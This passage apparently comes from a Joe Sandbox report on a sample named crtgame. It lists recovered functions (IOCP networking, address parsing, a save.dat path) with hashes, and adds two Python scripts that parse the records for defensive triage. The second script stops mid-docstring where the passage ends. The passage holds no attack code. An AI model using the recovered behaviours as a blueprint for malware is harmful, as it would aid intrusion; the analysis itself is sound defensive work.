                                                                                    • Opcode Fuzzy Hash: 1f3889a0b3d44742d98002d179cf3eacea2901caa73d6dab8b17824c6f4243b5
                                                                                    • Instruction Fuzzy Hash: 40F01772641605BFDB01AFA2ED88FC7BB6CFB44759F000912F60182841DB61AA698BF0
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,?), ref: 02C430C3
                                                                                    • WSAStringToAddressA.WS2_32(?,00000017,00000000,?,?), ref: 02C43102
                                                                                    • _memcmp.LIBCMT ref: 02C43141
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressErrorLastString_memcmp
                                                                                    • String ID: 255.255.255.255
                                                                                    • API String ID: 1618111833-2422070025
                                                                                    • Opcode ID: c3bf3c3e9567f250d2cdbc4551cec6e62c1bd19227ceff9a5033940670caf107
                                                                                    • Instruction ID: f6df3acaf2b280a785d86164bd99797b6fbb6cd0449a27b6e14ae3246afda797
                                                                                    • Opcode Fuzzy Hash: c3bf3c3e9567f250d2cdbc4551cec6e62c1bd19227ceff9a5033940670caf107
                                                                                    • Instruction Fuzzy Hash: 6E31C7719003589FDB209F64CC8476FB7A5FFC5324F2049A9EC5597280EB719A45CB94
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C41F5B
                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02C41FC5
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 02C41FD2
                                                                                      • Part of subcall function 02C41712: __EH_prolog.LIBCMT ref: 02C41717
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                    • String ID: iocp
                                                                                    • API String ID: 998023749-976528080
                                                                                    • Opcode ID: 939ce0c8f261096a99eca1d24f5cde15e0240e9b7f99a17fcf25bfe56a71a120
                                                                                    • Instruction ID: e8976f1cbc608f34b802a23bd600083466b0e025d4c163ecc4dee8b2854f7edd
                                                                                    • Opcode Fuzzy Hash: 939ce0c8f261096a99eca1d24f5cde15e0240e9b7f99a17fcf25bfe56a71a120
                                                                                    • Instruction Fuzzy Hash: 7D21B4B1901B449FC720DF6AD54455BFBF8FF94720B108A1FD8A693A90D7B0A644CF91
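The records above are the report's per-function view: each "APIs" list is one recovered function with its call sites (the "ref:" addresses), the arguments the static pass could resolve (unresolved ones print as "?"), the strings it references, and, under "Similarity", an Opcode ID and Instruction Fuzzy Hash intended for matching the same code in other reports. Read together, the CreateIoCompletionPort and PostQueuedCompletionStatus functions and the "iocp" string describe an I/O completion port event loop, and the WSAStringToAddressA function with its "255.255.255.255" comparison is an address-string parser; the resolved constant 00000017 in its second (AddressFamily) position is 23, which is AF_INET6 in the Windows headers. The script below is an editor's example added to this page, not Joe Sandbox code: it parses an excerpt of these records (constructed from the entries above; addresses, constants, strings and hashes are the report's own) into structured data, applies triage tags of my own naming, and collects the fuzzy hashes of tagged functions for pivoting. The record grammar is inferred from the report text, not taken from any Joe Sandbox specification.

```python
"""Turn per-function "APIs ... Similarity" records from a Joe Sandbox report
into structured data and tag the behaviours worth opening first.
Editor's example; the record grammar is inferred from the report text."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt: three records abbreviated from the report. Addresses,
# constants, strings and hashes are copied from the report, nothing is invented.
SAMPLE_REPORT = """\
APIs
• __EH_prolog.LIBCMT ref: 02C41F5B
• CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02C41FC5
• GetLastError.KERNEL32(?,00000000), ref: 02C41FD2
  • Part of subcall function 02C41712: __EH_prolog.LIBCMT ref: 02C41717
Strings
Memory Dump Source
Similarity
• API ID: H_prolog$CompletionCreateErrorLastPort
• String ID: iocp
• Instruction Fuzzy Hash: 7D21B4B1901B449FC720DF6AD54455BFBF8FF94720B108A1FD8A693A90D7B0A644CF91
APIs
• WSASetLastError.WS2_32(00000000,?,?,?), ref: 02C430C3
• WSAStringToAddressA.WS2_32(?,00000017,00000000,?,?), ref: 02C43102
• _memcmp.LIBCMT ref: 02C43141
Similarity
• String ID: 255.255.255.255
• Instruction Fuzzy Hash: 6E31C7719003589FDB209F64CC8476FB7A5FFC5324F2049A9EC5597280EB719A45CB94
APIs
• InterlockedIncrement.KERNEL32(?), ref: 02C41ED2
• PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02C41EEA
• RtlEnterCriticalSection.NTDLL(?), ref: 02C41EF9
• InterlockedExchange.KERNEL32(?,00000001), ref: 02C41F0E
• RtlLeaveCriticalSection.NTDLL(?), ref: 02C41F15
Similarity
• String ID:
• Instruction Fuzzy Hash: 40F01772641605BFDB01AFA2ED88FC7BB6CFB44759F000912F60182841DB61AA698BF0
"""

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR: " when the call is reported from a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+):\s*(?P<value>.*)$")  # "String ID: ..."

@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple             # "?" marks an argument the static pass did not resolve
    ref: str                # call-site address
    subcall: Optional[str]  # callee address the call was reported from, if any

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def entry(self) -> Optional[str]:
        """First direct call site; a usable label for the function."""
        direct = [c.ref for c in self.apis if c.subcall is None]
        return direct[0] if direct else None

def parse_records(text: str) -> list:
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":                  # every record opens with this header
            cur = FunctionRecord()
            records.append(cur)
            continue
        if not line or cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(m["args"].split(",")) if m["args"] else ()
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)            # bare headers like "Strings" fall through
        if m:
            cur.fields[m["key"]] = m["value"]
    return records

IOCP_APIS = {"CreateIoCompletionPort", "GetQueuedCompletionStatus", "PostQueuedCompletionStatus"}
WSA_FAMILIES = {2: "AF_INET", 23: "AF_INET6"}   # ws2def.h values on Windows

def triage(rec: FunctionRecord) -> list:
    """Editor's tags, emitted in a fixed order so records compare cleanly."""
    names = {c.name for c in rec.apis}
    tags = []
    if names & IOCP_APIS:
        tags.append("iocp-event-loop")
    if "WSAStringToAddressA" in names and rec.fields.get("String ID") == "255.255.255.255":
        tags.append("address-string-parse")
    if {"RtlEnterCriticalSection", "InterlockedExchange"} <= names:
        tags.append("cs-guarded-flag")
    return tags

def address_family(rec: FunctionRecord) -> Optional[str]:
    """Decode WSAStringToAddressA's AddressFamily argument only if it was resolved."""
    for c in rec.apis:
        if c.name == "WSAStringToAddressA" and len(c.args) > 1 and c.args[1] != "?":
            af = int(c.args[1], 16)
            return WSA_FAMILIES.get(af, f"af={af}")
    return None

def pivot_hashes(records: list, tag: str) -> list:
    """Fuzzy hashes of tagged functions, for finding the same code in other reports."""
    return [r.fields["Instruction Fuzzy Hash"] for r in records
            if tag in triage(r) and "Instruction Fuzzy Hash" in r.fields]
```

Anything the report prints as "?" is left alone rather than guessed at, so address_family only decodes a constant the analysis actually resolved. The tags say which functions to open in the disassembler first; they are not verdicts about the sample.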
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 02C53564
                                                                                      • Part of subcall function 02C529AC: __FF_MSGBANNER.LIBCMT ref: 02C529C3
                                                                                      • Part of subcall function 02C529AC: __NMSG_WRITE.LIBCMT ref: 02C529CA
                                                                                      • Part of subcall function 02C529AC: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001), ref: 02C529EF
                                                                                    • std::exception::exception.LIBCMT ref: 02C53582
                                                                                    • __CxxThrowException@8.LIBCMT ref: 02C53597
                                                                                      • Part of subcall function 02C53F5A: RaiseException.KERNEL32(?,?,?,02C70F6C,?,00000400,?,?,?,02C5359C,?,02C70F6C,00000000,00000001), ref: 02C53FAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                    • String ID: bad allocation
                                                                                    • API String ID: 3074076210-2104205924
                                                                                    • Opcode ID: b5179fe9084422006b8362cc55d9f2d4c0be8f9116d61f4f389e3a2515170696
                                                                                    • Instruction ID: b27f5091e5c2b7f8056ffe58c3c731aa063ebb85a0fe4df29ec1d28ae1d21404
                                                                                    • Opcode Fuzzy Hash: b5179fe9084422006b8362cc55d9f2d4c0be8f9116d61f4f389e3a2515170696
                                                                                    • Instruction Fuzzy Hash: 3EE0A07050026AAADF00EEA4CC489AFBBB9AB00340F8005D5EC14A6180DB71D794DAE9
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C437B6
                                                                                    • __localtime64.LIBCMT ref: 02C437C1
                                                                                      • Part of subcall function 02C52000: __gmtime64_s.LIBCMT ref: 02C52013
                                                                                    • std::exception::exception.LIBCMT ref: 02C437D9
                                                                                      • Part of subcall function 02C51ED3: std::exception::_Copy_str.LIBCMT ref: 02C51EEC
                                                                                      • Part of subcall function 02C49EB1: __EH_prolog.LIBCMT ref: 02C49EB6
                                                                                      • Part of subcall function 02C49EB1: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C49EC5
                                                                                      • Part of subcall function 02C49EB1: __CxxThrowException@8.LIBCMT ref: 02C49EE4
                                                                                    Strings
                                                                                    • could not convert calendar time to UTC time, xrefs: 02C437CE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                    • String ID: could not convert calendar time to UTC time
                                                                                    • API String ID: 1963798777-2088861013
                                                                                    • Opcode ID: 3b647d9c9220c77a6ed5e3269d369b2ae2ef8b88520b7c3c2a950b917566116a
                                                                                    • Instruction ID: 8cbf1e0bfcad47bc60042040409e308b5690e3420a3d7504761e27d20a07763b
                                                                                    • Opcode Fuzzy Hash: 3b647d9c9220c77a6ed5e3269d369b2ae2ef8b88520b7c3c2a950b917566116a
                                                                                    • Instruction Fuzzy Hash: 2AE06DF1D0015A9BCB14EF90D988BBFB779EF00340F104599DC15A2240DB749609DF84
                                                                                    APIs
                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C44149), ref: 02C50DBF
                                                                                      • Part of subcall function 02C43FDC: __EH_prolog.LIBCMT ref: 02C43FE1
                                                                                      • Part of subcall function 02C43FDC: CreateEventA.KERNEL32(00000000,02C4A5C3,?,00000000), ref: 02C43FF3
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C50DB4
                                                                                    • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02C44149), ref: 02C50E00
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02C44149), ref: 02C50ED1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$Event$CreateH_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 2825413587-0
                                                                                    • Opcode ID: e4abd94aeeec079c93da6322b228fd8cbe544003052db22f9c0568de567fa88b
                                                                                    • Instruction ID: 168be4066cf1720d0830baafa560a57ab68d8b8a90cab0e80f41253401d9301b
                                                                                    • Opcode Fuzzy Hash: e4abd94aeeec079c93da6322b228fd8cbe544003052db22f9c0568de567fa88b
                                                                                    • Instruction Fuzzy Hash: FD51C4715007558BDB11DF28C88479ABBE4FF88328F290618ECA9D7390DB35E985CF99
                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C5F94B
                                                                                    • __isleadbyte_l.LIBCMT ref: 02C5F979
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 02C5F9A7
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,00000000,00000000,?), ref: 02C5F9DD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: 3081d72aba2c45bad4f69de3fe4cd512031a76ff66d898f4cee85ab7e679be45
                                                                                    • Instruction ID: c76d61ca43c89a3b2b515c77b71e4b4c2225ebe627ef767f6a1259e8cb0b7952
                                                                                    • Opcode Fuzzy Hash: 3081d72aba2c45bad4f69de3fe4cd512031a76ff66d898f4cee85ab7e679be45
                                                                                    • Instruction Fuzzy Hash: A5313F31600A66BFDF298E35C884BBA7BA5FF82314F15452DEC6087590E330E9D0DB88
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 02C5FDB0
                                                                                      • Part of subcall function 02C529AC: __FF_MSGBANNER.LIBCMT ref: 02C529C3
                                                                                      • Part of subcall function 02C529AC: __NMSG_WRITE.LIBCMT ref: 02C529CA
  • Part of subcall function 02C529AC: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001), ref: 02C529EF
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: AllocateHeap_malloc
• String ID:
• API String ID: 501242067-0
• Opcode ID: 6c973406437d58c7ee02c989671d9ca3b8ee2dfa736c6652552feae2ee164acb
• Instruction ID: dce192e82d4690b7cfcc4f7ca6ce9de5e7b40558f5345fe0f34679ae0c42a8bc
• Opcode Fuzzy Hash: 6c973406437d58c7ee02c989671d9ca3b8ee2dfa736c6652552feae2ee164acb
• Instruction Fuzzy Hash: 42115C32840631ABCF292F71AC0875E379A9F023A4F10092DED4D96681DB74C5D0DAEC
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C51D92
• ___ascii_stricmp.LIBCMT ref: 02C51DCA
• __tolower_l.LIBCMT ref: 02C51DE0
  • Part of subcall function 02C5537A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C55388
  • Part of subcall function 02C5537A: __isctype_l.LIBCMT ref: 02C553A9
• __tolower_l.LIBCMT ref: 02C51DEF
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: Locale$UpdateUpdate::___tolower_l$___ascii_stricmp__isctype_l
• String ID:
• API String ID: 2995433114-0
• Opcode ID: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
• Instruction ID: 238b208b62ea1927c370606ad72bfe7c36b8936e5a85537e872dc60a887d6f23
• Opcode Fuzzy Hash: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
• Instruction Fuzzy Hash: AA110D329001756FD711AA69C88CB7A77A5AB41265F5C0258DC2957180EBF0DE80D6D4
APIs
• htons.WS2_32(?), ref: 02C43DA2
  • Part of subcall function 02C43BD3: __EH_prolog.LIBCMT ref: 02C43BD8
  • Part of subcall function 02C43BD3: std::bad_exception::bad_exception.LIBCMT ref: 02C43BED
• htonl.WS2_32(00000000), ref: 02C43DB9
• htonl.WS2_32(00000000), ref: 02C43DC0
• htons.WS2_32(?), ref: 02C43DD4
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
• String ID:
• API String ID: 3882411702-0
• Opcode ID: 262f59a5c93cddd4a66590d4009b29cdea9d682cdcdc7fefd36123449865f293
• Instruction ID: 34444227ea26e13d91d7a7c4b301688d319c470f90ca52967d5d79a4267efaca
• Opcode Fuzzy Hash: 262f59a5c93cddd4a66590d4009b29cdea9d682cdcdc7fefd36123449865f293
• Instruction Fuzzy Hash: 0511E135A00248EFCF019F64D889A5AB7B9FF48314F1089A6FD08DF200DB71DA18CBA1
APIs
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000001,?,?,00000001,?,?,02C4335F,?,?,?,?,?), ref: 02C423D0
• RtlEnterCriticalSection.NTDLL(?), ref: 02C423DE
• InterlockedExchange.KERNEL32(00000030,00000001), ref: 02C42401
• RtlLeaveCriticalSection.NTDLL(?), ref: 02C42408
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
• String ID:
• API String ID: 4018804020-0
• Opcode ID: c05f35864fc3bbfdb8d61096e1f3e7736a64248f3ea6f2e585653c7f3a9c7d64
• Instruction ID: c7bada42d87c0f639d6312f2b2ddf904d46aa5c083620e07fd5bd80d0840abeb
• Opcode Fuzzy Hash: c05f35864fc3bbfdb8d61096e1f3e7736a64248f3ea6f2e585653c7f3a9c7d64
• Instruction Fuzzy Hash: 2D11CE32600204AFDB209F61C985B67BBBCFF40708F1008ADFA019B140DBB1FA45CBA1
APIs
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction ID: f3e6d5c18df1fa39cc82c0b01bf053a785fc6a1d046626ddf1df86c2cf350bf2
• Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction Fuzzy Hash: A5014B3204025ABBCF126ED4CC418EE3F22BB59754B498416FE1899031D736CAB1AB85
APIs
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C424A9
• RtlEnterCriticalSection.NTDLL(?), ref: 02C424B8
• InterlockedExchange.KERNEL32(?,00000001), ref: 02C424CD
• RtlLeaveCriticalSection.NTDLL(?), ref: 02C424D4
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
• String ID:
• API String ID: 4018804020-0
• Opcode ID: 6339a32ef3d652d6d30a719e770062e386aca1b2e4b3d60e0e6d95001760e3cf
• Instruction ID: e4895ab2fa5891fa232850666a13950e978db4c2b3ab6c1c4f2dd140b79841fe
• Opcode Fuzzy Hash: 6339a32ef3d652d6d30a719e770062e386aca1b2e4b3d60e0e6d95001760e3cf
• Instruction Fuzzy Hash: F5F03C72640204BFDB00AF66EC88F9ABBACFF48714F004915FA04C6142D771E6648FA1
APIs
• __EH_prolog.LIBCMT ref: 02C42009
• RtlDeleteCriticalSection.NTDLL(?), ref: 02C42028
• CloseHandle.KERNEL32(00000000), ref: 02C42037
• CloseHandle.KERNEL32(00000000), ref: 02C4204E
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CriticalDeleteH_prologSection
• String ID:
• API String ID: 2456309408-0
• Opcode ID: e9e400e086f6831b683e3e158968fc0b1d0ec56fb1b00fc9e4fb9dd9e07ea7a3
• Instruction ID: d2f4aa70015ca6f771ea5626f08841db7c165226aa00246c5bd4a9f2f4cedc5b
• Opcode Fuzzy Hash: e9e400e086f6831b683e3e158968fc0b1d0ec56fb1b00fc9e4fb9dd9e07ea7a3
• Instruction Fuzzy Hash: A201DC719006049BC739AF64E84CBABFBF4EF04309F004A5DE84682990CF74A68CDFA5
APIs
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: Event$H_prologSleep
• String ID:
• API String ID: 1765829285-0
• Opcode ID: a466158d2207474e33648932f58bd7e0b7f75e15672374a3631fc4dd9613642c
• Instruction ID: d6ecaa902ddf11f1cfc60548f26344495ed3fa3231b3b752bbaa128236c14bbd
• Opcode Fuzzy Hash: a466158d2207474e33648932f58bd7e0b7f75e15672374a3631fc4dd9613642c
• Instruction Fuzzy Hash: 6CF05435A40110EFCB109F94D8CCB98BBA4FF0D311F1086A9F519DB290CB359854CBA1
APIs
• WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02C47D5C,?,?,00000000), ref: 02C49059
• getsockname.WS2_32(?,?,?), ref: 02C4906F
Strings
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: ErrorLastgetsockname
• String ID: &'
• API String ID: 566540725-655172784
• Opcode ID: f4418077ad7b20069541d419c75ae0a134ca5e14655a2a062ff99ef54479b171
• Instruction ID: e9af730b8703813e8afdc76c987438126aff318c14b4c30c24ad69a9654995d0
• Opcode Fuzzy Hash: f4418077ad7b20069541d419c75ae0a134ca5e14655a2a062ff99ef54479b171
• Instruction Fuzzy Hash: D7215172A00218DBDB10DF68D844ADFB7F5FF4C324F10856AE918EB281EB30E9458B94
APIs
• __EH_prolog.LIBCMT ref: 02C4C63D
  • Part of subcall function 02C4CC19: std::exception::exception.LIBCMT ref: 02C4CC48
  • Part of subcall function 02C4D3D2: __EH_prolog.LIBCMT ref: 02C4D3D7
  • Part of subcall function 02C5354C: _malloc.LIBCMT ref: 02C53564
  • Part of subcall function 02C4CC78: __EH_prolog.LIBCMT ref: 02C4CC7D
Strings
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02C4C673
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C4C67A
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
• API String ID: 1953324306-1943798000
• Opcode ID: 2fe158713eb83b6196db162048aab17dbb1491da1c8cd710fef36da8393a6997
• Instruction ID: 61ea43f1ba4c20f3dee6a0db78bb92cd64133c89b65ad30c7d7e53226c844710
• Opcode Fuzzy Hash: 2fe158713eb83b6196db162048aab17dbb1491da1c8cd710fef36da8393a6997
• Instruction Fuzzy Hash: CA21ADB1E012589ADB08EFE8D954BEEBBB5EF54700F10449EE806A7290DF749A08DF50
APIs
• __EH_prolog.LIBCMT ref: 02C4C732
  • Part of subcall function 02C4CCF0: std::exception::exception.LIBCMT ref: 02C4CD1D
  • Part of subcall function 02C4D509: __EH_prolog.LIBCMT ref: 02C4D50E
  • Part of subcall function 02C5354C: _malloc.LIBCMT ref: 02C53564
  • Part of subcall function 02C4CD4D: __EH_prolog.LIBCMT ref: 02C4CD52
Strings
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02C4C768
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C4C76F
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
• API String ID: 1953324306-412195191
• Opcode ID: 136af89ee188c62c71b148b576d3dcdf723b9d1b7b73bf776b26892335eed36e
• Instruction ID: ab62121c46118fb452d5a12310f49e7d1f2b86999b906b00fb03dc900a375698
• Opcode Fuzzy Hash: 136af89ee188c62c71b148b576d3dcdf723b9d1b7b73bf776b26892335eed36e
• Instruction Fuzzy Hash: DC21B1B1E012589BDB14EFE4D488BAEFBB5EF44704F14055EE806A7250DF705A08DF90
APIs
• _malloc.LIBCMT ref: 02C45288
  • Part of subcall function 02C529AC: __FF_MSGBANNER.LIBCMT ref: 02C529C3
  • Part of subcall function 02C529AC: __NMSG_WRITE.LIBCMT ref: 02C529CA
  • Part of subcall function 02C529AC: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001), ref: 02C529EF
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,00000000,00000001,00000000,00000000,?,02C475B2), ref: 02C4529A
Strings
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: AllocateFolderHeapPathSpecial_malloc
• String ID: \save.dat
• API String ID: 4128168839-3580179773
• Opcode ID: 8f2e61b8cb77f1a074034fe6515a663ed9d1f190a82603e67450e9bd45f603b9
• Instruction ID: 907d7d70a2c2f3e541803ee660b9ca1bafdb7516a9d771b67d08202531693b29
• Opcode Fuzzy Hash: 8f2e61b8cb77f1a074034fe6515a663ed9d1f190a82603e67450e9bd45f603b9
• Instruction Fuzzy Hash: 05117D72A042512BDB219E658C84A6FFF67DFC269471401ADEC4967201DAA31E02C6A0
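The SHGetSpecialFolderPathA record above passes 0x23 as its third (csidl) argument, which is CSIDL_COMMON_APPDATA (%ProgramData% on Vista and later), and the only string in the same function is \save.dat, so the file this function resolves is consistent with %ProgramData%\save.dat. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the report's API-reference lines into structured records, decodes the CSIDL argument of SHGetSpecialFolderPath*/SHGetFolderPath* calls and pairs it with the record's backslash-prefixed strings to produce candidate file IOCs. The CSIDL table is from shlobj.h; the sample input is the record above, copied in as constructed test data; pairing the folder with the string is a co-location heuristic, not a data-flow result, so the output is a candidate to confirm in the file-system events, not a proven path.

```python
"""Parse Joe Sandbox function-record 'APIs' lines and derive file-path IOCs
from SHGetSpecialFolderPath*/SHGetFolderPath* calls.

Added example; not part of the Joe Sandbox report or the analysed sample.
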